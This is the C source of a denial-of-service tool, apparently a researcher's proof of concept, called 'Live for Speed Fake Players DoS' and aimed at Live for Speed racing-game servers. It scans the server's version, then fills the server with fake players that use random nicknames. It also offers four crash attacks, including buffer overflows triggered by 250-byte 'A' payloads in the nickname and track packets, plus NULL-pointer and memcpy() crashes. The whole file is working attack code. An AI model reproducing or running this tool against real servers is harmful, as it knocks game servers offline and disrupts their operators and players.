/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "lfscrc.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
    DWORD       tid;
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <pthread.h>

    #define ONESEC  1
    #define stristr strcasestr
    pthread_t   tid;
#endif

#ifdef WIN32
    #define MSTHREAD(NAME,ARG)  DWORD WINAPI NAME(ARG)
    #define MSTHREADX(TID,THR,PAR) \
        if(!CreateThread(NULL, 0, (void *)&THR, (void *)PAR, 0, &TID)) { \
            printf("\nError: Unable to create thread\n"); \
            exit(1); \
        }
#else
    #define MSTHREAD(NAME,ARG)  void *NAME(ARG)
    #define MSTHREADX(TID,THR,PAR) \
        if(pthread_create(&TID, NULL, (void *)&THR, (void *)PAR)) { \
            printf("\nError: Unable to create thread\n"); \
            exit(1); \
        }
#endif



#define VER             "0.2.1"
#define BUFFSZ          256
#define PORT            63392
#define MAXSOCK         128
#define WAITSEC         5
#define TIMEOUT         30

typedef uint8_t         u8;
typedef uint16_t        u16;
typedef uint32_t        u32;



MSTHREAD(client, void);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int putmm(u8 *data, u8 *src, int len);
int getmm(u8 *data, u8 **dst, int len);
int rnds(u8 *data, int len);
int lfs_ver(u8 *dest, u8 *ver);
int send_lfs(int sock, u8 *data, u8 len);
int recv_lfs(int sock, u8 *buff);
int connetti(void);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



struct sockaddr_in  peer;
u_int   seed;
int     ready,
        full,
        disc,
        srvbuild    = 0,
        attack      = 0,
        demo        = 0;    // note that this tool uses a lot of work-arounds for working
u8      ver[8],             // on more versions... so if this code sux it's normal
        *password   = "";



int main(int argc, char *argv[]) {
    int     sd,
            i,
            len,
            received;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            maj,
            min,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Live for Speed Fake Players DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [options] <host>\n"
            "\n"
            "Options:\n"
            "-p PORT  port used by the server (%hu)\n"
            "-w PASS  specify the server's password\n"
            "-v VER   version to use (automatically scanned)\n"
            "-b NUM   build number (automatically scanned)\n"
            "\n"
            "Attacks versus version <= 0.5X10:\n"
            "-1       in-game nickname's buffer-overflow with packet ID 3\n"
            "-2       in-game crash (track's buffer-overflow) with packet ID 10\n"
            "-3       NULL pointer crash versus internet and hidden S1/S2 servers\n"
            "-4       memcpy() crash versus internet S1/S2 servers\n"
            "\n"
            "Note: this tool works only versus demo servers (except where is written\n"
            "      differently) but with some small modifications could work versus\n"
            "      other versions (S1/S2) too\n"
            "\n", argv[0], port);
        exit(1);
    }

    *ver = 0;

    argc--;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case 'p': port     = atoi(argv[++i]);           break;
            case 'w': password = argv[++i];                 break;
            case 'v': strncpy(ver, argv[++i], sizeof(ver)); break;
            case 'b': srvbuild = atoi(argv[++i]);           break;
            case '1': attack   = 1;                         break;
            case '2': attack   = 2;                         break;
            case '3': attack   = 3;                         break;
            case '4': attack   = 4;                         break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
                } break;
        }
    }

    host = argv[argc];
    p = strchr(host, ':');
    if(p) {
        *p = 0;
        port = atoi(p + 1);
    }

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    if(!*ver) {
        printf("- get server version:\n");

        sd = connetti();
        received = 0;

        for(maj = 0; maj < 10; maj++) {
            for(min = 0; min < 10; ) {
                sprintf(ver, "%hhu.%hhu", maj, min);

                lfs_ver(buff, ver);
                putxx(buff + 4, 28, 8);         // 29
                putxx(buff + 5, 0, 8);          // not needed
                putxx(buff + 8, 0, 32);

                if(send_lfs(sd, buff, 12) < 0) std_err();
                len = recv_lfs(sd, buff);
                if(len < 0) {
                    if(!received) goto ver_found;
                    // printf("- connection lost\n");
                    close(sd);
                    sd = connetti();
                    received = 0;
                    continue;
                    // goto ver_found;          // std_err();
                }

                received += len;
                printf("\t%hhu.%hhu.%-5d = %s\n", maj, min, srvbuild, buff);

                if(stristr(buff, "differ")) {
                    min++;
                } else if(!strchr(buff, '.')) {
                    srvbuild++;
                } else {
                    goto ver_found;
                }
            }
        }

ver_found:
        close(sd);

        p = strchr(buff, '.');
        if(!p) {
            for(;;) {
                sd = connetti();

                srvbuild++;
                lfs_ver(buff, ver);
                putxx(buff + 4, 28, 8);         // 29
                putxx(buff + 5, 0, 8);          // not needed
                putxx(buff + 8, 0, 32);
                if(send_lfs(sd, buff, 12) < 0) std_err();
                len = recv_lfs(sd, buff);
                close(sd);
                if((len >= 0) && strchr(buff, '.')) break;
            }
        }

        p = strchr(buff, '.');
        if(!p) {
            printf("\n"
                "Error: no version found, use the -v option. reply received:\n"
                "       %s\n"
                "\n", buff);
            exit(1);
        }
        sprintf(ver, "%hhu.%hhu%c%s", maj, min, p[2], p + 3);
        printf("\n- set version:   %s (%d)\n", ver, srvbuild);

        sd = connetti();

        lfs_ver(buff, ver);
        putxx(buff + 4, 29, 8);     // 29
        putxx(buff + 5, 1, 8);      // 1
        putxx(buff + 8, 0, 32);

        send_lfs(sd, buff, 12);
        len = recv_lfs(sd, buff);
        if(len < 0) {
            printf("\nAlert: no info received\n");
            goto ver_found;
        } else {
            if(stristr(buff, "Host is ")) goto ver_found;
            printf("\n"
                "- server name   %s\n"
                "- players       %hhu/%hhu\n",
                buff + 4,
                buff[0], buff[1]);
        }

        close(sd);
    }

    seed = time(NULL);

    printf("- start attack:\n");
    for(;;) {
        disc = 0;
        full = 0;

        for(i = 0; !full; i++) {
            printf("\n  Player: ");

            ready = 0;
            MSTHREADX(tid, client, NULL);

            while(!ready) sleep(ONESEC);    // all these sleep() are needed!
            sleep(ONESEC * 2);              // seems to exists a limit in LFS
        }

        if(i <= 1) {
            for(i = WAITSEC; i >= 0; i--) {
                printf("%3d\b\b\b", i);
                sleep(ONESEC);
            }
        } else {
            printf("\n"
                "- wait some seconds and then stop this tool\n"
                "  hopefully the server will restart or will be confused for a while\n");
            while(!disc) sleep(ONESEC);
        }
    }

    return(0);
}



MSTHREAD(client, void) {
    u32     chall,
            crc;
    int     sd,
            sdu,
            i,
            len;
    u8      buff[BUFFSZ],
            id,
            *p;

    sd = connetti();
    chall = 0;

    if(attack == 4) {
        lfs_ver(buff, ver);
        putxx(buff + 4, 29, 8);
        putxx(buff + 5, 5,  8);
        putxx(buff + 8, 0, 32);

        if(send_lfs(sd, buff, 12) < 0) goto end;

        len = recv_lfs(sd, buff);
        if(len < 0) goto end;

        printf("\n"
            "- malicious data sent, the tool now will continue normally if the server is\n"
            "  not vulnerable or will give an error if it's crashed\n");

        goto end;
    }

redo:
    for(;;) {
        lfs_ver(buff, ver);
        putxx(buff + 4, 29, 8);     // valid: 29
        putxx(buff + 5, 3,  8);     // valid: 3, 5
        putxx(buff + 8, chall, 32);
        p = buff + 12;
        if(!demo) {
            p += rnds(p, 24);       // nickname
            if(attack == 3) p[23] = 0;  // yes, that's all!!!
            p += rnds(p, 8);        // targa
            p += rnds(p, 8);        // ???
        }

        if(send_lfs(sd, buff, p - buff) < 0) goto end;

        len = recv_lfs(sd, buff);
        if(len < 0) goto end;

        if(len != 4) break;
        chall = lfscrc_pwd(*(u32 *)buff, password);
    }

    if(len == 32) {
        printf("  %s\n", buff);
        if(stristr(buff, "full")) {
            full = 1;
        } else if(stristr(buff, "password")) {
            printf("\n- use the -w option for specifying the password\n\n");
            exit(1);
        } else if(!demo && stristr(buff, "Host is ")) {
            demo = 1;
            chall = 0;
            goto redo;
        } else {
            printf("\nError: %s\n", buff);
            exit(1);
        }
        goto end;
    }

    lfs_ver(buff, ver);
    putxx(buff + 4, 29, 8);
    putxx(buff + 5, 0,  8);
    putxx(buff + 8, 0, 32);
    p = buff + 12;
    if(!demo) {
        p += rnds(p, 8);
    }

    if(send_lfs(sd, buff, p - buff) < 0) goto end;
    len = recv_lfs(sd, buff);
    if(len < 0) goto end;

    sdu = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sdu < 0) std_err();
    sendto(sdu, "LFS\0", 4, 0, (struct sockaddr *)&peer, sizeof(peer));
    sleep(0);   // double sending is better
    sendto(sdu, "LFS\0", 4, 0, (struct sockaddr *)&peer, sizeof(peer));
    close(sdu);

    len = recv_lfs(sd, buff);
    if(len < 0) goto end;

    getxx(buff + 12, &crc, 32);
    lfscrc(buff, crc, 3);
    putxx(buff + 12, 0, 32);

    if(send_lfs(sd, buff, 16) < 0) goto end;
    len = recv_lfs(sd, buff);
    if(len < 0) goto end;
    if(stristr(buff, "don't match")) {
        printf("\nError: %s\n", buff);
        exit(1);
    }

    do {
        p = buff;
        p += putxx(p, 1,  8);
        p += putxx(p, 22, 8);
        p += putxx(p, 0,  8);
        p += putxx(p, 0,  8);
        p += putxx(p, 0,  8);
        if(send_lfs(sd, buff, p - buff) < 0) goto end;
        len = recv_lfs(sd, buff);
        if(len < 0) goto end;
    } while(buff[0] != 19);
    //id = buff[1];
    id = 4;

    p = buff;
    p += putxx(p, 1,  8);
    p += putxx(p, 24, 8);
    p += putxx(p, id, 8);
    p += putxx(p, 0,  8);
    p += putxx(p, 0,  8);
    p += rnds(p, 24);       // nickname
    p += rnds(p, 8);        // targa

    if(send_lfs(sd, buff, p - buff) < 0) goto end;
    len = recv_lfs(sd, buff);
    if(len < 0) goto end;

    if((attack == 1) || (attack == 2))  {
        printf("\n- test attack %d\n", attack);

        p = buff;
        p += putxx(p, 1,  8);
        p += putxx(p, (attack == 1) ? 3 : 10, 8);
        p += putxx(p, 0,  8);
        p += putxx(p, 0,  8);
        p += putxx(p, 0,  8);
        memset(p, 'A', 250);    // 250 is the max allowed here
        p += 250;

        if(send_lfs(sd, buff, p - buff) < 0) goto end;
        len = recv_lfs(sd, buff);
        if(len < 0) goto end;

        printf("\n"
            "- malicious data sent, the tool now will continue normally if the server is\n"
            "  not vulnerable or will give an error if it's crashed\n");
    }

    ready = 1;
    for(i = 0; (len = recv_lfs(sd, buff)) > 0; i++) {
        if(!(i & 15)) { // sync data

            if(send_lfs(sd,
                "\x00\x99\x6a\xf9\xff\x18\x2f\xd2\xc8\x2c\x00\x00\xf3\xdc\x4f\x85"
                "\x00\x00\xe1\x3b\xed\x00\x98\x51\xb2\xe3\x37\x90\x33\xa3",
                30) < 0) goto end;

            if(send_lfs(sd, "\x00\xa0\x1b\x04\x00\x04\x0d\x16\xe3\x07", 10) < 0) goto end;

            fputc('o', stdout);
        } else {
            if(send_lfs(sd, buff, len) < 0) goto end;
        }

        sleep(ONESEC);  // limit for the amount of data to send/receive
        if(disc) goto end;
    }
    disc = 1;

end:
//    shutdown(sd, 2);
    close(sd);
    if(!ready) ready = 1;
    return(0);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = num >> (i << 3);
    }

    return(bytes);
}



int putmm(u8 *data, u8 *src, int len) {
    if(len < 0) {
        len = sprintf(data, "%s", src) + 1;
    } else {
        memcpy(data, src, len);
    }
    return(len);
}



int getmm(u8 *data, u8 **dst, int len) {
    *dst = data;
    if(len < 0) {
        len = strlen(data) + 1;
    }
    return(len);
}



int rnds(u8 *data, int size) {
    int     i,
            len;
    u8      *p = data;
    const static u8 table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    len = seed % size;
    if(len < 3) len = 3;    // at least a minimum

    for(i = 0; i < len; i++) {
        seed = (seed * 0x343FD) + 0x269EC3;
        *p++ = table[seed % (sizeof(table) - 1)];
    }
    for(; len < size; len++) {
        *p++ = 0;
    }
    return(p - data);
}



int lfs_ver(u8 *dest, u8 *verx) {
    u32     build;

    sscanf(verx, "%hhu.%hhu%c%hhu", &dest[0], &dest[1], &dest[2], &dest[3]);
    switch(dest[0]) {
        case 0:  build =     0; break;  // demo
        case 1:  build = 10000; break;  // S1
        case 2:  build = 20000; break;  // S2
        case 3:  build = 30000; break;  // S3
        default: {
            printf("\nError: unexistent build version (%d)\n", dest[0]);
            exit(1);
        }
    }
    build += srvbuild;

    *(u16 *)(dest + 6) = build;
    return(10);
}



int send_lfs(int sock, u8 *data, u8 len) {
    u8      buff[256];

    buff[0] = len;
    memcpy(buff + 1, data, len);    // this is the fastest solution, really!!!
    if(send(sock, buff, len + 1, 0) != (len + 1)) return(-1);
    fputc('.', stdout);
    return(0);
}



int recv_lfs(int sock, u8 *buff) {
    int     t;
    u8      len = 0,
            size;

    if(timeout(sock, TIMEOUT) < 0) return(-1);
    if(recv(sock, &size, 1, 0) <= 0) return(-1);

    while(len < size) {
        if(timeout(sock, TIMEOUT) < 0) return(-1);
        t = recv(sock, buff + len, size - len, 0);
        if(t <= 0) return(-1);
        len += t;
    }
    buff[len] = 0;  // useless except for some strings

    fputc('.', stdout);
    return(len);
}



int connetti(void) {
    int     sd;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
      < 0) std_err();
    return(sd);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fdr;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fdr);
    FD_SET(sock, &fdr);
    err = select(sock + 1, &fdr, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


